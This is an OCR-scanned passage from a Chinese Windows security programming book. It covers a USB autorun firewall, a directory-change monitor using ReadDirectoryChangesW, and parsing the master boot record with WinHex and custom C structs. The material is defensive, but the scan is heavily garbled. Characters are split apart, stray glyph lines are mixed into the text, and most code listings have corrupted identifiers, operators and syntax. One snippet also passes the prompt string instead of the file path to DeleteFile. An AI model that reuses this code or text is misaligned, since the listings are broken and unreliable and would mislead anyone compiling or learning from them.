DriverName .Format (检测 到 的 立 盘 盘 符 为 %c \r\n"™, 主 寺 ‘A')} 


// 显示 盘 符 


MessageBox (DriverName); 
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} 
将 其 编译 连接 并 运行 ， 插 入 一 个 UU 盘 ， 得 到 如 图 8-64 所 示 的 提示 。 


omewall 


[TO 
检 总 盟 IU 盘 矢 符 为 : I 


上 面 的 这 段 代 码 可 以 将 其 封装 为 一 个 函数 ， 封 装 后 的 函数 定义 如 下 : 


} 





图 8-64 检测 到 的 U 盘 盘 符 


VOID GetDriverName (DWORD dwData); 


在 使 用 类 似 DBT DEVICEARRIVAL 的 以 DBT 开头 的 宏 时 ， 应 包含 头 文件 “dbth” 文 件 。 


5. U 盘 防火 墙 的 完善 


前 面 已 经 获得 了 被 插入 U 盘 的 盘 符 ， 接 下 来 就 可 以 对 U 盘 上 的 Autorun.inf 文件 进行 分 


析 ， 并 删除 要 的 程序 ， 还 可 以 安全 地 打开 UU 盘 。 改 写 OnDeviceChange() 函 数 ， 以 实现 要 


\ 一 /一 


运行 


完成 的 功能 ， 有 具体 代码 如 下 : 


BOOL CUFirewallDlg:;:OnDeviceChange (UINT nEventType, 


{ 


if ( nEventType == DBT DEVICEARRIVAL ) 


{ 


GetDriverName (dwData); 
MessageBox (DriverName); 


EE ( DeriverName, !== #" ) 


{ 


m SafeOpen.EnableWindow (TRUE); 


CString File = DriverName; 
Fileé 4= "\WWautorun. inf", 


char szBuff[MAX PATH] = { 0 }; 


if ( GetFileAttributes (File.GetBuffer(0)) == -=1 
{ 

m SafeOpen.EnableWindow (FALSE); 

return FALSE? 
} 


// 获取 open 后 面 的 内 容 
GetPprivateProfileStringt( 
"AutoRun", 
"open™ 7 
NULL, 
szBuff, 
MAX PATH, 
File.GetBuffer (0) 
) 7 


CString "St 

str = "是 否 删除 : "; 

str 十 = szBuff; 

if ( MessageBox (str, NULL, MB YESNO) == IDYES ) 


// 删除 要 执行 的 文件 
DeleteFile(str.GetBuffer (0)); 


DWORD dwData) 


— 


漏 瑾 宝 将 出 区 啊 钵 ”山中 涛 
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} 
} 
else if ( npventType == DBT_DEVICEREMOVECOMPLETE ) 
{ 


m SafeOpen.EnableWindow (FALSE); 
} 


return TRUE? 
} 


安全 打开 可 盘 的 实现 代码 如 下 : 

void CUFirewallDlg::OnBtnSafeopen () 

. // TODO: Add your control notification handler code here 

; ShellExecute (NULL, "open", DriverName.GetBuffer(0), NULL, NULL, SW_ SHOW); 

用 DeleteFile() 函 数 删 除 U 盘 中 要 运行 的 程序 可 能 会 失败 ， 因 为 有 时 U 盘 并 没有 完全 准备 
好 。 可 以 通过 判断 来 完成 ， 但 这 里 就 不 给 出 代码 了 ， 读 者 可 自行 修改 完成 。 代 码 中 涉及 两 个 新 的 
API 函数 ， 分 别 是 GetPrivateProfileString0 和 ShellExecute()。 这 两 个 函数 的 功能 分 别 是 获取 配置 
文件 中 指定 键 的 键 值 、 运 行 指定 的 文件 或 文件 夹 。 读 者 可 以 通过 查询 MSDN 进行 详细 的 了 解 。 

在 上 面 的 程序 中 ， 通 过 提示 让 用 户 选 择 是 否 要 删除 U 盘 中 要 被 执行 的 文件 。 如 果 用 户 对 此 
并 没有 太 多 的 了 解 和 认识 的 话 , 很 有 可 能 不 删除 。 如 果 删 了 本 不 该 删 的 文件 ， 那么 用 户 对 该 软件 
的 友好 感 便 会 降低 。 应 该 如 何 做 呢 ?” 应 该 建立 一 个 白 名 单 和 黑 名 单 ， 无 论 是 通过 散 列 进行 比较 ， 
还 是 通过 文件 名 进行 比较 ， 都 可 以 。 当 然 ， 越 精确 的 匹配 方法 越 好 。 这 样 ， 就 可 以 提早 为 用 户 进 
行 判断 了 ， 然 后 给 出 一 个 安全 建议 ， 这 样 不 但 提高 了 软件 的 友好 度 ， 而 且 会 显得 相对 较为 专业 。 


8.3.4 目录 监控 工具 


前 面 介绍 了 通过 HOOK 技术 对 进程 创建 的 监控 ， 然 后 介绍 了 通过 CRC32 对 病毒 进行 查 
杀 ， 还 介绍 了 通过 使 用 WM_DEVICECHANGE 消息 对 UU 盘 的 防护 。 接 下 来 简单 讨论 如 何 通 
过 ReadDirectoryChangesW() 来 编写 一 个 监视 目录 变化 的 程序 。 

对 目录 及 目录 中 的 文件 实时 监控 ， 可 以 有 效 地 发 现 文件 被 改动 的 情况 。 就 好 像 在 本 地 安 
装 IIS 服务 器 ， 并 搭建 一 个 网 站 平台 ， 有 了 时候 会 遭 到 黑客 的 算 改 ， 而 程序 员 无 法 及 时 地 恢复 
被 算 改 的 页 面 ， 导 致 出 现 了 非常 不 好 的 影响 。 如 果 能 及 时 地 发 现 网 页 被 算 改 ， 并 及 时 地 恢复 
本 来 的 页 面 就 好 了 ， 那 么 该 如 何 做 呢 ? 

下 面 通过 一 个 简单 的 例子 来 介绍 如 何 监控 某 目录 及 目录 下 文件 的 变动 情况 。 首 先 需要 了 


解 的 函数 为 ReadDirectoryChangesW()， 其 定义 如 下 : 

BOOL ReadDirectoryChangesW( 
HANDLE hDirectory, 
LPVOID lpBuffer, 
DWORD nBufferLength, 
BOOL bwWwatchsubtree, 
DWORD dwNotifyFilter, 
LPDWORD lpBytesReturned, 
LPOVERLAPPED lpOverlapped, 
LPOVERLAPPED COMPLETION ROUTINE lpCompletionRoutine 


jr 

参数 说 明 如 下 。 

hDirectory: 该 参数 指向 一 个 要 监视 目录 的 句柄 。 该 目录 需要 用 FILE_LIST_DIRECTORY 
的 访问 权限 打开 。 
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lpBuffer: 该 参数 指向 一 个 内 存 的 缓冲 区 ， 它 用 来 存放 返回 的 结果 。 结 果 为 一 个 FILE_ 
NOTIFY_INFORMATION 的 数据 结构 。 

nBufferLength: 表示 缓冲 区 的 大 小 。 

bWatchSubtree: 该 参数 为 TRUE 时 ， 表 示 监 视 指定 目录 下 的 文件 及 子 目 录 下 的 文件 操作 。 
如 果 该 参数 为 FALSE， 则 只 监视 指定 目录 下 的 文件 ， 不 包含 子 目 录 下 的 文件 。 

dwNotifyFilter: 该 参数 指定 要 返回 何 种 文件 变更 后 的 类 型 ， 该 参数 的 常量 值 参见 MSDN。 

lpBytesReturned: 该 参数 返回 传 给 lpBuffer 结果 的 字 节 数 。 

lpOverlapped: 该 参数 执行 一 个 OVERLAPPED 结构 体 , 该 结构 体 用 于 异步 操作 ， 否 则 该 
数据 为 NULL。 

ReadDirectoryChangesW() 函 数 的 使 用 非常 简单 ， 下 面 通过 一 个 例子 介绍 其 使 用 。 该 例子 
是 对 EE 盘 目 录 进 行 监控 ,将 程序 编写 完成 后 对 EE 盘 进 行 简 单 的 文件 操作 ， 以 观察 程序 的 输出 
结构 。 完 整 的 代码 如 下 : 


#include <windows.h> 

#include <stdio.h> 

extern "C" 

BOOL 

WINAPI 

ReadDirectoryChangesw'( 

Tn HANDLE hDirectory, 

out bcount part (nBufferLength, *lpBytesReturned) LPVOIDIpBuffer, 
in DWORD npufferLength, 

in BOOL bwatchSubtree, 

in DWORD GQGwNotifyFilter, 

out LPDWORD lpBytesReturned, 

inout LPOVERLAPPED lpOverlapped, 

in opt LPOVERLAPPED COMPLETION ROUTINE lpCompletionRoutine 


) < 


DWORD WINAPI ThreadProc(LPVOID lpParam) 
{ 

BOOL bRet = FALSE; 

BYTE Buffer[1024] = { 0 }; 


FILE NOTIFY INEORMRTION *pBuffer = (FILE NOTIFY INFORMATION *)Buffer; 
DWORD BytesReturned = 0; 
HANDLE hrFile = CreateFilel("e:\\", 
FILE, LIST DIRECTORY, 
EFILE SHARE READ| FILE SHARE DELETE|FILE SHARE WRITE, 
NULL, 
OPEN EXISTING, 
FILE FLAG BACKUP SEMANTICS, 
NULL); 
if ( INVALID HANDLE VALUE == hFile ) 
return 1; 


} 
Pedntt (monit or NPVnAT) 


while ( TRUE ) 
{ 
ZeroMemory (Buffer, 1024); 
bRet = ReadDirectoryChangesW (hrFile, 
tBuffer, 
sizeof (Buffer), 
TRUE, 
FILE NOTIFY CHANGE_FILE NAMFE | // 修改 文件 名 
FILE NOTIFY CHANGE _ATTRIBUTES | // 修改 文件 属性 


尝 旨 一 将 梧 革 遇 狂 山 吕 小 
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FILE NOTIFY CHANGE LAST WRITE ，// 最 后 一 次 写 入 
&BytesReturned, 


第 NULL, NULL);? 
”| 
章 if ( bRet == TRUE ) 
| 
黑 char szFileName [MAX PATH] = { 0 }; 
客 | // 宽 字 符 转换 多 字 节 
编 WideCharToMultiByte (CP_ACP, 
程 0, 
实 PpBuffer->FileName, 
例 pBuffer->FileNameLength / 2， 
剖 | szFileName, 
析 MAX_ PATH, 
NULL, 
NULL); 
[2 switch (pBuffer->Action) 


{ 
// 添加 
case FILE ACTION ADDED: 
{ 
printf(" 添 加 : %s\r\n",， szFileName); 


break; 


} 
// 删除 
case FILE ACTION REMOVED: 
{ 
printf£ ("删除 : Ss\r\n", szFileName); 


break; 


} 
// 修改 
case FILE ACTION MODIFIED: 
{ 
printf ("修改 :: %s\r\n", szpileName); 


| break; 


} 
// 重 命名 
Case FILE ACTION_ RENAMED OLD NAME: 
{ 
print£(" 重 命名 : $s", szFileName); 
if ( pBuffer->NextEntryOffset != 0 ) 
{ 
FILE NOTIFY INFORMATION *tmpBuffer = (FILE NOTIFY INFORMATION *) 
{ (DWORD) pBuffer + pBuffer->NextEntryOffset); 
| switch ( tmpBuffer->Action ) 
{ 
case FILE ACTION RENAMED NEW_ NAME: 
ZeroMemory (szFileName, MAX PATH); 
WideCharToMultiByte {CP_ ACP, 
0; 
tmpBuffer->FileName, 
tmpBuffer->FileNameLength / 2, 
szFileName, 
MAX_PATH, 
NULE, 
NULL); 
近世 人 NE) 
break; 
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break; 
case FILE ACTION RENAMED NEW_ NAME: 
printf (* 重 命名 (new) : %s\r\n", szFileName); 
} 
} 
CloseHandle (hFile); 


return 0; 





} 
int main(int argc, char* argv[]) 
{ 
HANDLE hThread = CreateThread (NULL, 0, ThreadProc, NULL, 0, NULE);y 
if ( hThread == NULL ) 
{ 
return 一 7 
} 
WaitForSsingleObject (hThread, INFINITE); 
CloseHandle(hThread); 
return 07 
} 
将 程序 编译 连接 并 运行 ， 在 EE 盘 下 进行 简单 的 操作 ， 查 看 程序 对 E 盘 的 监视 输出 记录 ， 
如 图 8-65 所 示 。 Rn 要 





对 于 目录 监视 的 这 个 例子 ， 可 以 将 其 改 为 一 个 
简单 的 文件 防 算 改 程序 。 首 先 将 要 监视 的 文件 目录 
进行 备份 ， 然 后 对 文件 目录 进行 监视 ， 如 果 有 文件 图 8-65 ”目录 监控 输出 记录 
发 生 了 修改 ， 那 么 就 使 用 备份 目录 下 的 指定 文件 恢复 被 修改 的 文件 。 


8.4 实现 引导 区 解析 工具 


很 多 病毒 会 感染 磁盘 的 引导 区 ， 导 致 系统 在 启动 前 就 会 执行 病毒 。 关 于 引导 型 的 病毒 这 
里 不 多 做 介绍 ， 只 简单 介绍 引导 区 的 知识 ， 并 写 一 个 程序 来 简单 地 解析 引导 区 。 在 整个 过 程 
中 ， 编 写 程序 不 是 难点 ， 难 点 在 于 引导 区 的 各 数据 结构 和 各 结构 之 间 的 数据 关系 。 

为 了 能 写 出 程序 ， 先 进行 对 引导 区 的 手动 分 析 ， 使 用 的 工具 是 WinHex。 


8.4.1 通过 WinHex 手动 解析 引导 区 


WinHex 是 一 个 强大 的 十 六 进 制 编辑 工具 ， 也 是 一 个 强大 的 磁盘 编辑 工具 。 打 开 WinHex， 
并 打开 磁盘 ， 如 图 8-66、 图 8-67 和 图 8-68 所 示 。 

当 打 开 磁 盘 后 ， 会 看 到 很 多 密密麻麻 的 十 六 进 制 数据 ， 这 些 数 据 很 像 学 习 PE 文件 结构 
时 的 情况 。 一 眼看 上 去 不 能 理解 ， 当 根据 其 各 种 不 同 的 结构 进行 解析 后 就 一 目 了 然 了 。 因 此 ， 
重要 的 是 学 习 其 各 种 结构 。 这 里 不 对 硬盘 中 涉及 的 全 部 结构 都 进行 介绍 《〈 指 的 是 文件 格式 )， 
主要 介绍 组 成 引导 区 的 各 个 结构 体 。 


将 珊 财 是 钼 山北 


尝 型 宰 






















尝 型 裤 将 沿革 员 钵 册 o 波 


| 


”第 8 章 黑客 编程 实例 剖析 





区 1 ns eA ee 
Wateat, | Ue 1 2 9 WH 3 6 Wi Wg A DE 
0000000000 3 Co 8E DO BC 00 7C FE 50 07 50 IF FC BE 1B 7C 
D000000010 ,BF 16 06 50 57 B9 E5 O01 F3 A4 CB BD BE 07 B1 












0006000004 
000000005014E 10 E8 46 00 73 2A FE 46 10 88 7E 04 08 74 0B 
0000000060 


现 请 和 


计生) 2 
”只 项 数据 库 0) 





0D0000000090 


图 8-66 WinHex 工具 栏 图 8-67 选择 物理 磁盘 


引导 区 ， 也 叫 主 引导 记录 (Master Boot Record，MBR)。MBR 位 于 整个 硬盘 的 0 柱 面 0 磁 
头 工 扇 区 的 位 置 处 。MBR 在 计算 机 引导 过 程 中 起 着 重要 的 作用 。MBR 可 以 分 为 5 部 分 , 分 别 是 
引导 程序 、Windows 磁盘 签名 、 保 留 位 、 分 区 表 和 结束 标志 。 这 五 部 分 构成 了 一 个 完整 的 引导 区 ， 
引导 区 的 大 小 为 512 字 节 。 通 过 WinHex 来 具体 查看 每 一 部 分 的 内 容 ， 了 解 这 $12 字 节 的 作用 。 
首先 来 看 引导 记录 ， 如 图 8-69 所 示 。 





DfESset BE .NE 和 和 旺 2 
0000000000 33 ©0 BE DO BC 00 7C FB S50 07 S50 1F FC BE 18 7C 
0000000010 BF 18 06 50 57 B9 ES 01 F3 A4 CB BD BE 07 Bl 04 
0000000020 38 6E 00 7C 09 75 13 83 C5 10 £2 F4 CD 18 8B FS 
0000000030 83 C6 10 49 74 19 38 2C 34 F6 AD B5 07 B4 07 8 
0000000040 FO ac 3C 00 74 FC BB 07 00 84 OE CD 10 EB F2 86 
0000008059 4E 10 E8 46 00 73 2A FE 46 10 89 7E 84 08 74 Bl 
0000000060 80 7E 04 bc 74 05 AD B6 07 75 B2 80 46 02 06 83| 
0000000070 46 08 06 83 56 OA 00 ES 21 00 73 05 A0 B6 07 FEB| 
0D000000080 BC 81 3E FE 7D 55 AA 74 08 80 7E 10 00 74 C8 二 0 
bo000000090 B7 07 EB A9 BB FC 1E 57 BB F5 CB BF 05 00 aA 56| 
00000000&0 00 B4 08 CD 13 72 23 8A Cl 24 3F 98 8A DE 6A FO 











图 8-68 打开 后 的 位 置 图 8-69 MBR 的 引导 程序 


在 图 8-69 中 ， 被 选中 的 地 方 就 是 MBR 的 引导 程序 。 引 导 程 序 会 判断 MBR 的 有 效 性 ， 
判断 磁盘 分 区 的 合法 性 ， 及 把 控制 权 交 给 操作 系统 。 引 导 程 序 占 用 了 MBR 的 前 440 字 节 。 
再 来 看 Windows 的 磁盘 签名 ， 如 图 8-70 所 示 。 


poooooolao oo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
booo0o0lB0 00 00 00 00 00 2¢ 44 63 SF BF SF 2 00 00 80 01 


图 8-70 MBR 中 的 Windows 磁盘 签名 


在 图 8-70 中 , 被 选中 的 位 置 就 是 Windows 的 磁盘 签名 , 它 的 位 置 在 紧 接 引导 程序 的 第 4 
字 节 。Windows 磁盘 签名 对 于 MBR 来 说 不 是 必需 的 ， 但 是 对 于 Windows 系统 来 说 是 必需 的 ， 





于 
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它 是 Windows 系统 在 初始 化 时 写 入 的 。Windows 依靠 磁盘 签名 来 识别 硬盘 ， 如 果 该 签名 丢失 ， 

则 Windows 认为 该 磁盘 没有 被 初始 化 。 在 图 8-70 中 ，Windows 的 磁盘 签名 为 “0xBFSFBFSF”。 
紧 接 在 磁盘 签名 后 的 两 字 节 是 保留 字 节 ， 也 就 是 暂时 没有 被 MBR 使 用 的 位 置 。 
保留 的 两 字 节 后 的 64 字 节 ， 则 保存 了 分 区 表 ， 如 图 8-71 所 示 。 





00000003F0 00 00 00 00 00 00 00 69 00 0 00 99 00 咽 55 az 





图 8-71 MBR 中 的 分 区 表 


分 区 表 在 MBR 中 占用 了 64 字 节 的 位 置 。 分 区 表 被 称 为 DPT (Disk Partition Table)， 它 
在 MBR 中 是 一 个 非常 关键 的 数据 结构 。 分 区 表 是 用 来 管理 硬盘 分 区 的 ， 如 果 丢 失 或 者 破坏 
的 话 ， 硬 盘 的 分 区 就 会 丢失 。 分 区 表 占 用 了 64 字 节 ， 用 每 16 字 节 来 描述 一 个 分 区 项 的 数据 
结构 。 由 于 其 字 节 数 的 限制 ， 一 个 硬盘 最 多 可 以 有 4 个 主 硬盘 分 区 (注意 ， 是 主 硬盘 分 区 )。 
图 8-71 中 框 住 的 部 分 就 是 一 个 分 区 表 项 ， 可 以 看 出 ，MBR 中 只 有 两 个 分 区 表 项 。 硬 盘 中 的 
磁盘 可 以 分 为 主 磁盘 分 区 和 扩展 分 区 ， 使 用 过 DOS 命令 中 的 FDISDK 的 话 应 该 很 清楚 。 通 
常情 况 下 ， 主 分 区 是 C 盘 。 在 系统 中 除了 C 盘 以 外 ， 还 可 能 存在 D 盘 、E 盘 、F 盘 等 分 区 ， 
这 3 个 分 区 都 是 从 扩展 分 区 中 分 配 出 来 的 ， 而 这 些 分 区 并 不 在 MBR 中 保存 。 右 键 单 击 “ 我 
的 电脑 ” 在 菜单 中 选择 “管理 ”命令 ， 将 出 现 “ 计 算 机 管理 ”程序 ， 选 择 “磁盘 管理 ” 显 
示 如 图 8-72 所 示 的 窗口 。 





-一 一 一 = 一 一 一 一 
(G {D:) {E) (F:) 《SG 
9,77 G5 NIFS | 地.53.G5 NTFS 19.53GB8 FAT32 || 17,87 GB FAT32 
良好 (条 : 出 状 态 良好 “1 状态 良好 状态 良好 | 状态 良好 (页 下 出 


图 8-72 ”磁盘 管理 





从 图 8-72 中 可 以 看 出 ， 在 磁盘 上 ，D 盘 、E 盘 、F 盘 、G 得 的 周围 有 一 个 绿色 的 框 ， 这 
个 框 就 表示 为 扩展 分 区 。 

下 面具 体 地 介绍 。 单 击 WinHex 的 菜单 项 “视图 ”一 “模板 管理 ”命令 ， 出 现 图 8-73 所 

在 “模板 管理 器 ”对 话 框 中 双击 “Master Boot Record”， 也 就 是 主 引导 记录 ， 出 现 图 8-74 
所 示 的 MBR 的 偏 移 解析 器 。 

在 图 8-74 中 可 以 清晰 地 看 到 两 个 分 区 表 项 的 内 容 ， 分 别 是 Partition Table Entry #1 和 
Partition Table Entry #2。 有 用 的 字段 已 经 用 框 选 中 。 下 面 介绍 Partition Table Entry #1 中 有 用 
的 几 个 字段 。 第 一 个 是 在 MBR 中 偏 移 为 0x1BE 的 位 置 ， 这 个 位 置 的 值 为 0x80。 该 值 是 一 个 
引导 标志 ， 表 示 该 分 区 是 一 个 活动 分 区 。 在 MBR 中 偏 移 0x1C2 的 位 置 处 保存 的 值 为 0x07， 
这 个 值 表示 的 是 分 区 的 类 型 ，0x07 表示 该 值 为 NTFS 的 系统 文件 格式 。 在 偏 移 0x1C6 的 位 置 
处 保存 的 值 为 63， 该 值 表示 在 本 分 区 前 使 用 了 多 少 个 扇 区 ， 这 里 表示 当前 分 区 前 使 用 了 63 
个 扇 区 。 最 后 一 个 0x1CA 处 保存 的 值 为 16386237， 该 位 置 表 示 本 分 区 的 总 扇 区 数 。 一 个 扇 
区 有 512 个 字 节 数 ， 那 么 16386237 个 扇 区 是 多 大 了 呢 ? 首先 用 16386237 x 512 求 出 本 扇 区 占 
多 少 字 节 。 通 过 计算 得 知 ， 本 分 区 所 占 字 节 数 为 8389753344 字 节 。 那 么 字 节 如 何 转换 成 GB 
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了 呢 ? 这 是 一 个 简单 的 公式 ，1024 字 节 等 于 1KB，1024KB 等 于 IMB，1024MB 等 于 1GB， 那 
么 做 一 个 简单 的 除法 就 可 以 了 。 用 8389753344/1024/1024/1024 就 得 出 了 当前 分 区 是 多 少 个 
GB 了 ， 结 果 如 图 8-75 所 示 。 





2 Master Boot Record, 功 融 篇 称 景 :0 ~ x| 
Offset 标题 数值 二 

0 Waster bootstrap loade |B3 CO BE DO BC 00 7C FB 50 07 50 

188 Windows disk signatu | SFBFSFEF 

TB8 Same reversed BFSFOFSE 





IBoot Sector BIDS parsmeter block (PPB) snd more 
Boot Sector BIOS parametar block (BPB) and more 
Boot Sector MIF: Boot sector of an NTPS partition 

Ext2/Ext3 Directory Entry Locates the Inode for & given filename 

4 Locates the mata blocks for % block eronp 

Contains 4 file 5 meta information (classic block formattine) 

To be applisd to ofEset 1024 of sn Ext2/3/4 partition 

Worsal/short entry Eormpt 

Long entry fornat 

Located 1024 bytes Erom the start of the volune 


Te ba spplisd to records in the Master File Table 
Suparbloci for Formatd40 of Roiserk 
ReiaerRS Superblock Tb 0 





图 8-73 ”模板 管理 器 图 8-74 MBR 偏 移 解 析 器 


从 图 8-75 可 以 看 出 ， 当 前 的 分 区 占用 了 7.81 GB 的 大 小 〈C 盘 大 小 为 7.81GB )。 关 于 
Partition Table Entry #2， 读 者 可 以 自己 进行 
分 析 ， 这 里 就 不 介绍 了 。 

在 MBR 中 还 有 最 后 一 个 内 容 ， 如 图 8-71 
所 示 ， 紧 接着 DPT 后 面 的 两 字 节 就 是 MBR 
中 最 后 的 两 字 节 。 这 两 字 节 是 MBR 的 结束 
标志 ， 用 “55 AA” 表 示 。 引 导 程 序 会 判断 
MBR 扁 区 的 最 后 两 字 节 是 否 为 “55 AA”， 
如 果 不 是 则 报错 。 , 

到 此 ， 关 于 MBR 的 部 分 就 介绍 完了 ， 图 8-75 第 一 个 分 区 的 大 小 
相信 读者 已 对 MBR 有 了 比较 全 面 的 了 解 。 下 面 来 写 一 个 简单 的 程序 ， 将 上 面 通过 WinHex 
分 析 的 内 容 解析 出 来 。 


8.4.2 通过 程序 解析 MBR 


现在 解析 MBR 可 能 不 会 有 太 大 的 问题 ， 因 为 前 面 解析 过 PE 文件 结构 。 虽 然 解 析 过 PE 
文件 ， 但 是 还 是 有 微小 的 几 点 差别 。 首 先 造 成 解析 困难 的 一 点 是 MBR 没有 给 出 具体 的 结构 
体 。 当初 分 析 PE 文件 结构 时 ， 各 结构 体 在 WinNth 头 文件 中 都 给 出 了 定义 ， 而 MBR 的 定义 
是 没有 给 出 的 。 因 此 上 面 也 没有 对 照 着 结构 体 进 行 介 绍 。 再 一 个 问题 是 解析 PE 文件 结构 时 ， 
会 打开 具体 的 可 执行 文件 去 按照 PE 文件 结构 的 定义 进行 解析 ， 而 硬盘 的 引导 区 属于 哪个 文 
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件 ? 用 WinHex 打开 的 是 物理 硬盘 , 那么 如 何 打开 物理 硬盘 ? 这 可 能 是 两 个 比较 困惑 的 地 方 。 
不 过 ， 这 些 都 不 是 太 大 的 问题 。 只 要 解决 了 这 两 个 问题 ， 解 析 就 容易 多 了 。 


8.4.3 自 定 义 MBR 的 各 种 结构 体 


下 面 介绍 如 何 将 MBR 的 信息 定义 成 一 个 个 结构 体 。 通 过 前 面 用 WinHex 对 MBR 的 手动 分 
析 ， 了 解 到 MBR 分 为 五 部 分 ， 并 且 知 道 每 部 分 占用 的 字 节 数 。 因 此 ， 可 以 将 MBR 定义 为 如 下 : 


typedef struct _MBR 
{ 


unsigned char BootRecord[440]; // 引导 程序 
ansigned char ulSigned[4]; // Windows 磁盘 签名 
unsigned char sReserve[2]; A 

unsigned char Dpt[64]; /7 分 区 表 
unsigned char EndSsign[2]; // 结束 标志 


}MBR, *PMBR’; 

这 就 是 定义 的 MBR， 引 导 程 序 共 440 字 节 ，Windows 签名 共 4 字 节 ， 保 留 字 节 共 2 字 
节 , 分 区 表 共 64 字 节 ， 再 加 上 2 个 结束 标志 ， 一共 512 字 节 。 不 过 这 样 的 定义 并 不 好 ， 因 为 
里 面 的 常量 比较 多 ， 现 在 修改 一 下 ， 定 义 如 下 : 


#define BOOTRECORDSIZE 440 
#define DPTSIZE 64 


typedef struct MBR 
{ 


unsigned char BootRecord[BOOTRECORDSIZE]; // 引导 程序 
unsigned char ulSigned[4]; /7 Windows 人 磁盘 签名 
Unsigned char sReserve[2]; // 保留 位 
unsigned char Dpt [DPTSIZE]; 7/ 分 区 表 
unsigned char Endsign[2]; // 结束 标志 


}MBR, *PMBR; 

这 样 定义 后 , 可 以 很 方便 地 获得 引导 程序 的 大 小 和 分 区 表 的 大 小 。 虽然 这 样 定义 直观 些 ， 
但 是 还 不 算 太 直观 ， 因 为 定义 的 都 是 unsigned char 类 型 ， 无 法 真正 反映 出 每 个 成 员 变量 的 具 
体 含义 。 下 面 再 次 进行 修改 ; 


#define BOOTRECORDSIZE 440 


typedef struct _BOOTRECORD 
{ 

unsigned char BootRecord[BOOTRECORDSITZE]; 
}BOOTRECORD, *PBOOTRECORD; 


#define DPTSIZE 64 


typedef struct _DPT 
{ 

unsigned char Dpt [DPTSIZE]; 
}DPT, *PDPT; 


typedef struct MBR 
{ 


BOOTRECORD BootRecord; // 引导 程序 
unsigned char ulSigned[4]:; // Windows 人 磁 查 签名 
unsigned char sReserve[2]; // 保留 位 

DEF Dpt; // 分 区 表 
unsigned char EndSign([2]; // 结束 标志 


}MBR, *PMBR; 
这 次 修改 后 ， 可 以 很 容易 地 从 MBR 结构 体 中 看 出 主要 两 个 成 员 变 量 的 含义 。 虽 然 直观 
了 ， 但 还 是 有 问题 。Dpt 其 实 是 一 个 有 4 条 记录 的 表 ， 也 就 是 说 ， 它 其 实 是 一 个 数组 ， 这 样 
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定义 后 ， 不 利于 它 的 解析 。 这 样 的 定义 方便 一 次 性 将 DPT 读 出 ， 只 要 再 定义 一 个 DP 的 结构 
体 来 对 DPT 进行 转换 ， 就 可 以 方便 地 对 DPT 进行 解析 。 下 面 再 次 定义 一 个 结构 体 : 


#define DPTNUMBER 4 


EVDSGSEE 'Struct SDR 
{ 


unsigned char BootSign; // 引导 标志 
unsigned char StartHsc[3]? 
unsigned char PartitionType; // 分 区 类 型 
unsigned char EndHsc[3]; 
ULONG Sectorspreceding; // 本 分 区 之 前 使 用 的 扇 区 数 
ULONG Sectorsinpartition; // 分 区 的 总 扇 区 数 
}DP, *PpDP; 


有 了 这 个 结构 体 ， 就 可 以 方便 地 对 DPT 进行 解析 了 。 最 后 两 个 定义 就 是 对 MBR 各 结构 体 
的 完整 定义 (这 几 个 结构 体 是 笔者 自己 定义 的 ， 可 能 会 有 很 多 考虑 不 周 的 地 方 。 网 上 有 公开 的 结 
构 体 的 定义 ， 读 者 可 以 自行 参考 。 之 所 以 如 此 反复 介绍 如 何 进行 MBR 结构 体 的 定义 ， 是 想 告 诉 
读者 一 个 在 没有 相关 数据 结构 定义 的 情况 下 通过 自己 的 分 析 来 定义 数据 结构 的 思路 和 方法 )。 

请 读者 思考 一 下 ， 如 果 不 定义 这 些 结构 体 ， 是 不 是 就 无 法 对 MBR 进行 解析 ， 定 义 了 这 
些 结构 体 后 对 于 解析 MBR 有 哪些 影响 。 对 于 MBR 的 解析 ， 可 以 完全 不 定义 这 些 结构 体 。 定 
义 这 些 结构 体 的 目的 是 方便 对 程序 的 后 期 维护 ， 并 使 程序 在 整体 上 有 一 个 良好 的 格式 。 定 义 
数据 结构 可 以 清晰 地 表达 各 数据 结构 之 间 的 关系 ， 让 程序 员 在 写 程序 的 过 程 中 有 一 个 清晰 的 
思路 ， 让 看 程序 的 人 也 可 以 一 目 了 然 。 


8.4.4 硬盘 设备 的 符号 链接 


有 了 上 面 的 结构 体 ， 解 析 MBR 已 经 不 是 太 大 的 问题 了 。 不 过 还 有 一 个 问题 ， 那 就 是 如 
何 打 开 硬 盘 读 取 MBR。 其 实 很 简单 ， 只 要 打开 硬盘 设备 提供 的 设备 符号 链接 就 可 以 了 。 如 何 
找到 硬盘 的 设备 符号 链接 昵 ?》 有 一 款 工具 WinObj 可 以 帮助 查找 到 。 打 开 WinObj， 再 依次 打 
开 左 边 的 树 形 控件 ， 如 图 8-76 所 示 。 

通过 图 8-76 可 以 找到 硬盘 设备 的 设备 名 , 例如 可 以 通过 \Device\HarddiskO\DR0 这 个 设备 
名 查找 相应 的 设备 符号 链接 。 再 依次 打开 WinObj 左边 的 树 形 控件 ， 如 图 8-77 所 示 。 


pee? 
De FCIO022 
PeeVpe Pc 


Smbakd xz 





[机 necorowe Sone pe 4 
| Root somo 0000 (S356 Ie boof 10942-0003 et jepoonnoos 
aoc haa ss (tl ，SFROIGIY 


evce0005005 














图 8-76 用 WinObj 找到 的 硬盘 设备 图 8-77 用 WinObj 找到 的 硬盘 设备 符号 链接 
从 图 8-77 中 可 以 看 到 ， 硬 盘 的 设备 符号 链接 为 PhysicalDrive0， 在 使 用 时 应 该 书写 为 
\\PhysicalDrive0。 





中 
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下 面 简 单 地 介绍 设备 名 和 设备 符号 链接 。 每 个 设备 在 Windows 的 内 核 中 都 有 对 应 的 驱动 
模块 ， 在 驱动 模块 中 会 为 设备 提供 一 个 名 字 来 对 设备 进行 操作 ， 驱 动 模块 中 提供 的 名 字 即 为 
“设备 名 ”设备 名 只 能 在 内 核 模块 中 使 用 。 如 果 想 要 在 应 用 程序 下 对 设备 进行 操作 ， 不 能 直 
接 使 用 设备 名 ， 应 该 使 用 设备 符号 链接 。 设 备 符号 链接 就 是 驱动 模块 为 应 用 程序 提供 的 操作 
设备 的 一 个 符号 ， 通 过 这 个 符号 可 与 设备 进行 对 应 。 


8.4.5 解析 MBR 的 程序 实现 


到 了 这 里 ， 读 者 可 能 会 觉得 通过 程序 解析 MBR 已 经 不 是 问题 了 。 下 面 直接 提供 程序 的 代码 。 


如 果 读 者 对 代码 有 不 理解 的 地 方 ， 可 以 参考 这 里 如 何 通 过 WinHex 对 MBR 进行 解析 。 代 码 如 下 : 
显示 数据 
pe a a hDevice, PMBR pMbr) 


{ 
DWORD dwRead = 0; 
ReadFile({hDevice, (LPVOID)pPMbr, sizeof (MBR), &dwRead, NULEL); 


